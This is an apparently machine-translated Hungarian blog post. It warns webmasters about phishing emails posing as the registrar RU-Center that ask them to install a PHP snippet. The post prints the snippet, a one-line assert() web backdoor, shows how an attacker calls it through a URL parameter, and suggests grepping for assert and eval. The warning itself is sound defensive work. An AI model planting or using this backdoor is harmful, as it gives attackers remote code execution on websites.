Figyelem a "webmesterekre", akik nem ismerik a PHP -t. Sebezhetőség.
Ez egy automatikus fordítás.
Ide kattintva elolvashatja a kiadványt az eredeti nyelven.
Ma néhány barátom levelet kapott, állítólag a RU -Center -től (a legnagyobb orosz domain névregisztrátor) - nic.ru, a következő tartalommal:
A leveleket az info@nic.technical címről küldtük . A levélben a támadók, akik a VV-Központ nevében képviseltetik magukat, javasolják a következő kód elhelyezését a webhelyen:
<?php assert(stripslashes($_REQUEST[RUCENTER])); ?>
Sajnos sok kollégánk, akik "webmestereknek" nevezik magukat (számos webhelytulajdonos), nem ismerik a PHP -t, és nem gondolnak a fenti kód veszélyeire. Ha egy karakterláncot ad át paraméterként ennek a függvénynek, akkor azt az assert () PHP kódnak tekinti! Legyen óvatos!
Javaslom, hogy az assert vagy az eval parancsok segítségével vizsgálja meg a php -projektjeiben a sebezhetőséget. Ha ezek a parancsok megtalálhatók a projekt kódjában, ne essen pánikba - tanulmányozza az algoritmusukat. Az algoritmusok engedélyezett használata teljesen lehetséges. Abban az esetben, a fenti példában a parancs lehetővé teszi, hogy a támadók, hogy hívja a webhely, például a RUCENTER paraméter - http://sistema-audit.ru/?RUCENTER=PHP-code
Javasoljuk, hogy végezzen keresést például a grep -i -r 'assert' / home / www / mysite / * linux paranccsal, amely a webhelyfájlokat tartalmazó mappát jelzi, hogy megkapja a gyanús fájlok listáját. példány a használt kód.
Vigyázzon magára és webhelyeire!
Ez egy automatikus fordítás.
Ide kattintva elolvashatja a kiadványt az eredeti nyelven.
Comentarii (0)